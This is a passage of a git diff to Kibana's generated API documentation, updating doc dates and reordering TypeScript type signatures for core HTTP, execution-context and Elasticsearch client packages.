symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", + ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; [kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", "default", "; helpers: ", "default", @@ -2735,6 +2733,8 @@ "TermvectorsResponse", ">; }; textStructure: ", "default", + "; transform: ", + "default", "; updateByQuery: { (this: That, params: ", "UpdateByQueryRequest", " | ", diff --git a/api_docs/kbn_core_elasticsearch_server_internal.mdx b/api_docs/kbn_core_elasticsearch_server_internal.mdx index f751875e20763..39dcd4303d4d7 100644 --- a/api_docs/kbn_core_elasticsearch_server_internal.mdx +++ b/api_docs/kbn_core_elasticsearch_server_internal.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-elasticsearch-server-internal title: "@kbn/core-elasticsearch-server-internal" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-elasticsearch-server-internal plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-elasticsearch-server-internal'] --- import kbnCoreElasticsearchServerInternalObj from './kbn_core_elasticsearch_server_internal.devdocs.json'; diff --git a/api_docs/kbn_core_elasticsearch_server_mocks.mdx b/api_docs/kbn_core_elasticsearch_server_mocks.mdx index d0f0fab5c0b7b..774053af02777 100644 --- a/api_docs/kbn_core_elasticsearch_server_mocks.mdx +++ b/api_docs/kbn_core_elasticsearch_server_mocks.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-elasticsearch-server-mocks title: "@kbn/core-elasticsearch-server-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-elasticsearch-server-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-elasticsearch-server-mocks'] --- import kbnCoreElasticsearchServerMocksObj from './kbn_core_elasticsearch_server_mocks.devdocs.json'; diff --git a/api_docs/kbn_core_environment_server_internal.mdx b/api_docs/kbn_core_environment_server_internal.mdx index a14db3412623e..7240e5abd4245 100644 --- a/api_docs/kbn_core_environment_server_internal.mdx +++ b/api_docs/kbn_core_environment_server_internal.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-environment-server-internal title: "@kbn/core-environment-server-internal" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-environment-server-internal plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-environment-server-internal'] --- import kbnCoreEnvironmentServerInternalObj from './kbn_core_environment_server_internal.devdocs.json'; diff --git a/api_docs/kbn_core_environment_server_mocks.mdx b/api_docs/kbn_core_environment_server_mocks.mdx index cc754fbb24087..87bc881350ed0 100644 --- a/api_docs/kbn_core_environment_server_mocks.mdx +++ b/api_docs/kbn_core_environment_server_mocks.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-environment-server-mocks title: "@kbn/core-environment-server-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-environment-server-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-environment-server-mocks'] --- import kbnCoreEnvironmentServerMocksObj from './kbn_core_environment_server_mocks.devdocs.json'; diff --git a/api_docs/kbn_core_execution_context_browser.mdx b/api_docs/kbn_core_execution_context_browser.mdx index 1a257ac01fb04..583d395d07768 100644 --- a/api_docs/kbn_core_execution_context_browser.mdx +++ b/api_docs/kbn_core_execution_context_browser.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-execution-context-browser title: "@kbn/core-execution-context-browser" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-execution-context-browser plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-execution-context-browser'] --- import kbnCoreExecutionContextBrowserObj from './kbn_core_execution_context_browser.devdocs.json'; diff --git a/api_docs/kbn_core_execution_context_browser_internal.mdx b/api_docs/kbn_core_execution_context_browser_internal.mdx index b4ccae312f808..2c3098e588910 100644 --- a/api_docs/kbn_core_execution_context_browser_internal.mdx +++ b/api_docs/kbn_core_execution_context_browser_internal.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-execution-context-browser-internal title: "@kbn/core-execution-context-browser-internal" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-execution-context-browser-internal plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-execution-context-browser-internal'] --- import kbnCoreExecutionContextBrowserInternalObj from './kbn_core_execution_context_browser_internal.devdocs.json'; diff --git a/api_docs/kbn_core_execution_context_browser_mocks.mdx b/api_docs/kbn_core_execution_context_browser_mocks.mdx index 6e303aea9a8b9..04d7dd0c8c613 100644 --- a/api_docs/kbn_core_execution_context_browser_mocks.mdx +++ b/api_docs/kbn_core_execution_context_browser_mocks.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-execution-context-browser-mocks title: "@kbn/core-execution-context-browser-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-execution-context-browser-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-execution-context-browser-mocks'] --- import kbnCoreExecutionContextBrowserMocksObj from './kbn_core_execution_context_browser_mocks.devdocs.json'; diff --git a/api_docs/kbn_core_execution_context_common.mdx b/api_docs/kbn_core_execution_context_common.mdx index 6bfe8f5e96039..7e019164ad89b 100644 --- a/api_docs/kbn_core_execution_context_common.mdx +++ b/api_docs/kbn_core_execution_context_common.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-execution-context-common title: "@kbn/core-execution-context-common" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-execution-context-common plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-execution-context-common'] --- import kbnCoreExecutionContextCommonObj from './kbn_core_execution_context_common.devdocs.json'; diff --git a/api_docs/kbn_core_execution_context_server.mdx b/api_docs/kbn_core_execution_context_server.mdx index 7cd960c4de634..f5049184de13b 100644 --- a/api_docs/kbn_core_execution_context_server.mdx +++ b/api_docs/kbn_core_execution_context_server.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-execution-context-server title: "@kbn/core-execution-context-server" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-execution-context-server plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-execution-context-server'] --- import kbnCoreExecutionContextServerObj from './kbn_core_execution_context_server.devdocs.json'; diff --git a/api_docs/kbn_core_execution_context_server_internal.mdx b/api_docs/kbn_core_execution_context_server_internal.mdx index 0a4e462c51f0d..0c75bf83ccdf7 100644 --- a/api_docs/kbn_core_execution_context_server_internal.mdx +++ b/api_docs/kbn_core_execution_context_server_internal.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-execution-context-server-internal title: "@kbn/core-execution-context-server-internal" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-execution-context-server-internal plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-execution-context-server-internal'] --- import kbnCoreExecutionContextServerInternalObj from './kbn_core_execution_context_server_internal.devdocs.json'; diff --git a/api_docs/kbn_core_execution_context_server_mocks.mdx b/api_docs/kbn_core_execution_context_server_mocks.mdx index 68f827b7f3bf9..ab041fb4d9c6f 100644 --- a/api_docs/kbn_core_execution_context_server_mocks.mdx +++ b/api_docs/kbn_core_execution_context_server_mocks.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-execution-context-server-mocks title: "@kbn/core-execution-context-server-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-execution-context-server-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-execution-context-server-mocks'] --- import kbnCoreExecutionContextServerMocksObj from './kbn_core_execution_context_server_mocks.devdocs.json'; diff --git a/api_docs/kbn_core_fatal_errors_browser.mdx b/api_docs/kbn_core_fatal_errors_browser.mdx index e099829b9d812..8e1ec0f65a923 100644 --- a/api_docs/kbn_core_fatal_errors_browser.mdx +++ b/api_docs/kbn_core_fatal_errors_browser.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-fatal-errors-browser title: "@kbn/core-fatal-errors-browser" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-fatal-errors-browser plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-fatal-errors-browser'] --- import kbnCoreFatalErrorsBrowserObj from './kbn_core_fatal_errors_browser.devdocs.json'; diff --git a/api_docs/kbn_core_fatal_errors_browser_mocks.mdx b/api_docs/kbn_core_fatal_errors_browser_mocks.mdx index c86d7a66254cc..7e5e287bbaaea 100644 --- a/api_docs/kbn_core_fatal_errors_browser_mocks.mdx +++ b/api_docs/kbn_core_fatal_errors_browser_mocks.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-fatal-errors-browser-mocks title: "@kbn/core-fatal-errors-browser-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-fatal-errors-browser-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-fatal-errors-browser-mocks'] --- import kbnCoreFatalErrorsBrowserMocksObj from './kbn_core_fatal_errors_browser_mocks.devdocs.json'; diff --git a/api_docs/kbn_core_http_browser.devdocs.json b/api_docs/kbn_core_http_browser.devdocs.json index d39d743fa868f..492a459206603 100644 --- a/api_docs/kbn_core_http_browser.devdocs.json +++ b/api_docs/kbn_core_http_browser.devdocs.json @@ -259,12 +259,12 @@ "id": "def-common.HttpFetchQuery.Unnamed", "type": "IndexSignature", "tags": [], - "label": "[key: string]: string | number | boolean | number[] | string[] | boolean[] | null | undefined", + "label": "[key: string]: string | number | boolean | string[] | number[] | boolean[] | null | undefined", "description": [ "\nTypeScript note: Technically we should use this interface instead, but @types/node uses the below stricter\ndefinition, so to avoid TypeScript errors, we'll restrict our version.\n\n[key: string]:\n | string\n | number\n | boolean\n | Array\n | undefined\n | null;" ], "signature": [ - "[key: string]: string | number | boolean | number[] | string[] | boolean[] | null | undefined" + "[key: string]: string | number | boolean | string[] | number[] | boolean[] | null | undefined" ], "path": "packages/core/http/core-http-browser/src/types.ts", "deprecated": false diff --git a/api_docs/kbn_core_http_browser.mdx b/api_docs/kbn_core_http_browser.mdx index aab9d4d5da4b6..e554e7b5e6bb6 100644 --- a/api_docs/kbn_core_http_browser.mdx +++ b/api_docs/kbn_core_http_browser.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-http-browser title: "@kbn/core-http-browser" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-http-browser plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-http-browser'] --- import kbnCoreHttpBrowserObj from './kbn_core_http_browser.devdocs.json'; diff --git a/api_docs/kbn_core_http_browser_internal.mdx b/api_docs/kbn_core_http_browser_internal.mdx index 7794fe20db1ee..7584e0edc1dfd 100644 --- a/api_docs/kbn_core_http_browser_internal.mdx +++ b/api_docs/kbn_core_http_browser_internal.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-http-browser-internal title: "@kbn/core-http-browser-internal" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-http-browser-internal plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-http-browser-internal'] --- import kbnCoreHttpBrowserInternalObj from './kbn_core_http_browser_internal.devdocs.json'; diff --git a/api_docs/kbn_core_http_browser_mocks.mdx b/api_docs/kbn_core_http_browser_mocks.mdx index 35925b74efee7..daf6547d14761 100644 --- a/api_docs/kbn_core_http_browser_mocks.mdx +++ b/api_docs/kbn_core_http_browser_mocks.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-http-browser-mocks title: "@kbn/core-http-browser-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-http-browser-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-http-browser-mocks'] --- import kbnCoreHttpBrowserMocksObj from './kbn_core_http_browser_mocks.devdocs.json'; diff --git a/api_docs/kbn_core_http_common.mdx b/api_docs/kbn_core_http_common.mdx index d0f8fbf3e0b9a..f43008bd1de28 100644 --- a/api_docs/kbn_core_http_common.mdx +++ b/api_docs/kbn_core_http_common.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-http-common title: "@kbn/core-http-common" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-http-common plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-http-common'] --- import kbnCoreHttpCommonObj from './kbn_core_http_common.devdocs.json'; diff --git a/api_docs/kbn_core_http_context_server_mocks.mdx b/api_docs/kbn_core_http_context_server_mocks.mdx index 6846f1f6ae7b4..9fa36dedf7330 100644 --- a/api_docs/kbn_core_http_context_server_mocks.mdx +++ b/api_docs/kbn_core_http_context_server_mocks.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-http-context-server-mocks title: "@kbn/core-http-context-server-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-http-context-server-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-http-context-server-mocks'] --- import kbnCoreHttpContextServerMocksObj from './kbn_core_http_context_server_mocks.devdocs.json'; diff --git a/api_docs/kbn_core_http_router_server_internal.mdx b/api_docs/kbn_core_http_router_server_internal.mdx index 068e9027c45dc..b4a2ba93627b5 100644 --- a/api_docs/kbn_core_http_router_server_internal.mdx +++ b/api_docs/kbn_core_http_router_server_internal.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-http-router-server-internal title: "@kbn/core-http-router-server-internal" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-http-router-server-internal plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-http-router-server-internal'] --- import kbnCoreHttpRouterServerInternalObj from './kbn_core_http_router_server_internal.devdocs.json'; diff --git a/api_docs/kbn_core_http_router_server_mocks.mdx b/api_docs/kbn_core_http_router_server_mocks.mdx index 6dc19cbd665e1..6cb7f42149ad2 100644 --- a/api_docs/kbn_core_http_router_server_mocks.mdx +++ b/api_docs/kbn_core_http_router_server_mocks.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-http-router-server-mocks title: "@kbn/core-http-router-server-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-http-router-server-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-http-router-server-mocks'] --- import kbnCoreHttpRouterServerMocksObj from './kbn_core_http_router_server_mocks.devdocs.json'; diff --git a/api_docs/kbn_core_http_server.devdocs.json b/api_docs/kbn_core_http_server.devdocs.json index 97a0dd3ec3e50..036e900ab9e8d 100644 --- a/api_docs/kbn_core_http_server.devdocs.json +++ b/api_docs/kbn_core_http_server.devdocs.json @@ -4073,7 +4073,7 @@ "\nReadonly copy of incoming request headers." ], "signature": [ - "{ from?: string | string[] | undefined; origin?: string | string[] | undefined; warning?: string | string[] | undefined; location?: string | string[] | undefined; date?: string | string[] | undefined; expires?: string | string[] | undefined; range?: string | string[] | undefined; allow?: string | string[] | undefined; accept?: string | string[] | undefined; host?: string | string[] | undefined; etag?: string | string[] | undefined; authorization?: string | string[] | undefined; \"accept-language\"?: string | string[] | undefined; \"accept-patch\"?: string | string[] | undefined; \"accept-ranges\"?: string | string[] | undefined; \"access-control-allow-credentials\"?: string | string[] | undefined; \"access-control-allow-headers\"?: string | string[] | undefined; \"access-control-allow-methods\"?: string | string[] | undefined; \"access-control-allow-origin\"?: string | string[] | undefined; \"access-control-expose-headers\"?: string | string[] | undefined; \"access-control-max-age\"?: string | string[] | undefined; \"access-control-request-headers\"?: string | string[] | undefined; \"access-control-request-method\"?: string | string[] | undefined; age?: string | string[] | undefined; \"alt-svc\"?: string | string[] | undefined; \"cache-control\"?: string | string[] | undefined; connection?: string | string[] | undefined; \"content-disposition\"?: string | string[] | undefined; \"content-encoding\"?: string | string[] | undefined; \"content-language\"?: string | string[] | undefined; \"content-length\"?: string | string[] | undefined; \"content-location\"?: string | string[] | undefined; \"content-range\"?: string | string[] | undefined; \"content-type\"?: string | string[] | undefined; cookie?: string | string[] | undefined; expect?: string | string[] | undefined; forwarded?: string | string[] | undefined; \"if-match\"?: string | string[] | undefined; \"if-modified-since\"?: string | string[] | undefined; \"if-none-match\"?: string | string[] | undefined; \"if-unmodified-since\"?: string | string[] | undefined; \"last-modified\"?: string | string[] | undefined; pragma?: string | string[] | undefined; \"proxy-authenticate\"?: string | string[] | undefined; \"proxy-authorization\"?: string | string[] | undefined; \"public-key-pins\"?: string | string[] | undefined; referer?: string | string[] | undefined; \"retry-after\"?: string | string[] | undefined; \"sec-websocket-accept\"?: string | string[] | undefined; \"sec-websocket-extensions\"?: string | string[] | undefined; \"sec-websocket-key\"?: string | string[] | undefined; \"sec-websocket-protocol\"?: string | string[] | undefined; \"sec-websocket-version\"?: string | string[] | undefined; \"set-cookie\"?: string | string[] | undefined; \"strict-transport-security\"?: string | string[] | undefined; tk?: string | string[] | undefined; trailer?: string | string[] | undefined; \"transfer-encoding\"?: string | string[] | undefined; upgrade?: string | string[] | undefined; \"user-agent\"?: string | string[] | undefined; vary?: string | string[] | undefined; via?: string | string[] | undefined; \"www-authenticate\"?: string | string[] | undefined; } & { [header: string]: string | string[] | undefined; }" + "{ accept?: string | string[] | undefined; \"accept-language\"?: string | string[] | undefined; \"accept-patch\"?: string | string[] | undefined; \"accept-ranges\"?: string | string[] | undefined; \"access-control-allow-credentials\"?: string | string[] | undefined; \"access-control-allow-headers\"?: string | string[] | undefined; \"access-control-allow-methods\"?: string | string[] | undefined; \"access-control-allow-origin\"?: string | string[] | undefined; \"access-control-expose-headers\"?: string | string[] | undefined; \"access-control-max-age\"?: string | string[] | undefined; \"access-control-request-headers\"?: string | string[] | undefined; \"access-control-request-method\"?: string | string[] | undefined; age?: string | string[] | undefined; allow?: string | string[] | undefined; \"alt-svc\"?: string | string[] | undefined; authorization?: string | string[] | undefined; \"cache-control\"?: string | string[] | undefined; connection?: string | string[] | undefined; \"content-disposition\"?: string | string[] | undefined; \"content-encoding\"?: string | string[] | undefined; \"content-language\"?: string | string[] | undefined; \"content-length\"?: string | string[] | undefined; \"content-location\"?: string | string[] | undefined; \"content-range\"?: string | string[] | undefined; \"content-type\"?: string | string[] | undefined; cookie?: string | string[] | undefined; date?: string | string[] | undefined; etag?: string | string[] | undefined; expect?: string | string[] | undefined; expires?: string | string[] | undefined; forwarded?: string | string[] | undefined; from?: string | string[] | undefined; host?: string | string[] | undefined; \"if-match\"?: string | string[] | undefined; \"if-modified-since\"?: string | string[] | undefined; \"if-none-match\"?: string | string[] | undefined; \"if-unmodified-since\"?: string | string[] | undefined; \"last-modified\"?: string | string[] | undefined; location?: string | string[] | undefined; origin?: string | string[] | undefined; pragma?: string | string[] | undefined; \"proxy-authenticate\"?: string | string[] | undefined; \"proxy-authorization\"?: string | string[] | undefined; \"public-key-pins\"?: string | string[] | undefined; range?: string | string[] | undefined; referer?: string | string[] | undefined; \"retry-after\"?: string | string[] | undefined; \"sec-websocket-accept\"?: string | string[] | undefined; \"sec-websocket-extensions\"?: string | string[] | undefined; \"sec-websocket-key\"?: string | string[] | undefined; \"sec-websocket-protocol\"?: string | string[] | undefined; \"sec-websocket-version\"?: string | string[] | undefined; \"set-cookie\"?: string | string[] | undefined; \"strict-transport-security\"?: string | string[] | undefined; tk?: string | string[] | undefined; trailer?: string | string[] | undefined; \"transfer-encoding\"?: string | string[] | undefined; upgrade?: string | string[] | undefined; \"user-agent\"?: string | string[] | undefined; vary?: string | string[] | undefined; via?: string | string[] | undefined; warning?: string | string[] | undefined; \"www-authenticate\"?: string | string[] | undefined; } & { [header: string]: string | string[] | undefined; }" ], "path": "packages/core/http/core-http-server/src/router/request.ts", "deprecated": false @@ -4344,7 +4344,7 @@ "label": "options", "description": [], "signature": [ - "Method extends \"options\" | \"get\" ? Required | Record" + "Record<\"accept\" | \"accept-language\" | \"accept-patch\" | \"accept-ranges\" | \"access-control-allow-credentials\" | \"access-control-allow-headers\" | \"access-control-allow-methods\" | \"access-control-allow-origin\" | \"access-control-expose-headers\" | \"access-control-max-age\" | \"access-control-request-headers\" | \"access-control-request-method\" | \"age\" | \"allow\" | \"alt-svc\" | \"authorization\" | \"cache-control\" | \"connection\" | \"content-disposition\" | \"content-encoding\" | \"content-language\" | \"content-length\" | \"content-location\" | \"content-range\" | \"content-type\" | \"cookie\" | \"date\" | \"etag\" | \"expect\" | \"expires\" | \"forwarded\" | \"from\" | \"host\" | \"if-match\" | \"if-modified-since\" | \"if-none-match\" | \"if-unmodified-since\" | \"last-modified\" | \"location\" | \"origin\" | \"pragma\" | \"proxy-authenticate\" | \"proxy-authorization\" | \"public-key-pins\" | \"range\" | \"referer\" | \"retry-after\" | \"sec-websocket-accept\" | \"sec-websocket-extensions\" | \"sec-websocket-key\" | \"sec-websocket-protocol\" | \"sec-websocket-version\" | \"set-cookie\" | \"strict-transport-security\" | \"tk\" | \"trailer\" | \"transfer-encoding\" | \"upgrade\" | \"user-agent\" | \"vary\" | \"via\" | \"warning\" | \"www-authenticate\", string | string[]> | Record" ], "path": "packages/core/http/core-http-server/src/router/headers.ts", "deprecated": false, @@ -8418,7 +8418,7 @@ "\nSet of HTTP methods not changing the state of the server." ], "signature": [ - "\"options\" | \"get\"" + "\"get\" | \"options\"" ], "path": "packages/core/http/core-http-server/src/router/route.ts", "deprecated": false, diff --git a/api_docs/kbn_core_http_server.mdx b/api_docs/kbn_core_http_server.mdx index c93d460376f93..4ab4d705475c4 100644 --- a/api_docs/kbn_core_http_server.mdx +++ b/api_docs/kbn_core_http_server.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-http-server title: "@kbn/core-http-server" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-http-server plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-http-server'] --- import kbnCoreHttpServerObj from './kbn_core_http_server.devdocs.json'; diff --git a/api_docs/kbn_core_http_server_internal.devdocs.json b/api_docs/kbn_core_http_server_internal.devdocs.json index b0c482d9afc03..87f187a690989 100644 --- a/api_docs/kbn_core_http_server_internal.devdocs.json +++ b/api_docs/kbn_core_http_server_internal.devdocs.json @@ -712,7 +712,7 @@ "label": "HttpConfigType", "description": [], "signature": [ - "{ readonly basePath?: string | undefined; readonly uuid?: string | undefined; readonly publicBaseUrl?: string | undefined; readonly name: string; readonly ssl: Readonly<{ key?: string | undefined; certificateAuthorities?: string | string[] | undefined; certificate?: string | undefined; keyPassphrase?: string | undefined; redirectHttpFromPort?: number | undefined; } & { enabled: boolean; keystore: Readonly<{ path?: string | undefined; password?: string | undefined; } & {}>; truststore: Readonly<{ path?: string | undefined; password?: string | undefined; } & {}>; cipherSuites: string[]; supportedProtocols: string[]; clientAuthentication: \"none\" | \"required\" | \"optional\"; }>; readonly host: string; readonly port: number; readonly compression: Readonly<{ referrerWhitelist?: string[] | undefined; } & { enabled: boolean; }>; readonly cors: Readonly<{} & { enabled: boolean; allowCredentials: boolean; allowOrigin: string[] | \"*\"[]; }>; readonly autoListen: boolean; readonly shutdownTimeout: moment.Duration; readonly securityResponseHeaders: Readonly<{} & { referrerPolicy: \"origin\" | \"no-referrer\" | \"no-referrer-when-downgrade\" | \"origin-when-cross-origin\" | \"same-origin\" | \"strict-origin\" | \"strict-origin-when-cross-origin\" | \"unsafe-url\" | null; disableEmbedding: boolean; strictTransportSecurity: string | null; xContentTypeOptions: \"nosniff\" | null; permissionsPolicy: string | null; }>; readonly customResponseHeaders: Record; readonly maxPayload: ", + "{ readonly basePath?: string | undefined; readonly uuid?: string | undefined; readonly publicBaseUrl?: string | undefined; readonly host: string; readonly name: string; readonly ssl: Readonly<{ key?: string | undefined; certificateAuthorities?: string | string[] | undefined; certificate?: string | undefined; keyPassphrase?: string | undefined; redirectHttpFromPort?: number | undefined; } & { enabled: boolean; keystore: Readonly<{ path?: string | undefined; password?: string | undefined; } & {}>; truststore: Readonly<{ path?: string | undefined; password?: string | undefined; } & {}>; cipherSuites: string[]; supportedProtocols: string[]; clientAuthentication: \"optional\" | \"none\" | \"required\"; }>; readonly port: number; readonly compression: Readonly<{ referrerWhitelist?: string[] | undefined; } & { enabled: boolean; }>; readonly cors: Readonly<{} & { enabled: boolean; allowCredentials: boolean; allowOrigin: string[] | \"*\"[]; }>; readonly autoListen: boolean; readonly shutdownTimeout: moment.Duration; readonly securityResponseHeaders: Readonly<{} & { referrerPolicy: \"origin\" | \"no-referrer\" | \"no-referrer-when-downgrade\" | \"origin-when-cross-origin\" | \"same-origin\" | \"strict-origin\" | \"strict-origin-when-cross-origin\" | \"unsafe-url\" | null; disableEmbedding: boolean; strictTransportSecurity: string | null; xContentTypeOptions: \"nosniff\" | null; permissionsPolicy: string | null; }>; readonly customResponseHeaders: Record; readonly maxPayload: ", "ByteSizeValue", "; readonly rewriteBasePath: boolean; readonly keepaliveTimeout: number; readonly socketTimeout: number; readonly xsrf: Readonly<{} & { disableProtection: boolean; allowlist: string[]; }>; readonly requestId: Readonly<{} & { allowFromAnyIp: boolean; ipAllowlist: string[]; }>; }" ], diff --git a/api_docs/kbn_core_http_server_internal.mdx b/api_docs/kbn_core_http_server_internal.mdx index c5562650f9688..7466d3c931bf7 100644 --- a/api_docs/kbn_core_http_server_internal.mdx +++ b/api_docs/kbn_core_http_server_internal.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-http-server-internal title: "@kbn/core-http-server-internal" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-http-server-internal plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-http-server-internal'] --- import kbnCoreHttpServerInternalObj from './kbn_core_http_server_internal.devdocs.json'; diff --git a/api_docs/kbn_core_http_server_mocks.devdocs.json b/api_docs/kbn_core_http_server_mocks.devdocs.json index 6dbdb8ddceb1f..d24bcb8fcab1b 100644 --- a/api_docs/kbn_core_http_server_mocks.devdocs.json +++ b/api_docs/kbn_core_http_server_mocks.devdocs.json @@ -147,7 +147,7 @@ "OnPreResponseHandler", "]>; } & Omit<", "HttpServiceSetup", - ", \"basePath\" | \"createRouter\"> & { basePath: BasePathMocked; createRouter: jest.MockedFunction<() => ", + ", \"createRouter\" | \"basePath\"> & { basePath: BasePathMocked; createRouter: jest.MockedFunction<() => ", "RouterMock", ">; }" ], @@ -255,7 +255,7 @@ "RequestHandlerContextBase", ">) => void]>; } & Omit<", "InternalHttpServiceSetup", - ", \"basePath\" | \"auth\" | \"createRouter\" | \"authRequestHeaders\"> & { auth: AuthMocked; basePath: BasePathMocked; createRouter: jest.MockedFunction<(path: string) => ", + ", \"createRouter\" | \"basePath\" | \"auth\" | \"authRequestHeaders\"> & { auth: AuthMocked; basePath: BasePathMocked; createRouter: jest.MockedFunction<(path: string) => ", "RouterMock", ">; authRequestHeaders: jest.Mocked<", "IAuthHeadersStorage", diff --git a/api_docs/kbn_core_http_server_mocks.mdx b/api_docs/kbn_core_http_server_mocks.mdx index 3ddf07e0162f4..5244d5c49974c 100644 --- a/api_docs/kbn_core_http_server_mocks.mdx +++ b/api_docs/kbn_core_http_server_mocks.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-http-server-mocks title: "@kbn/core-http-server-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-http-server-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 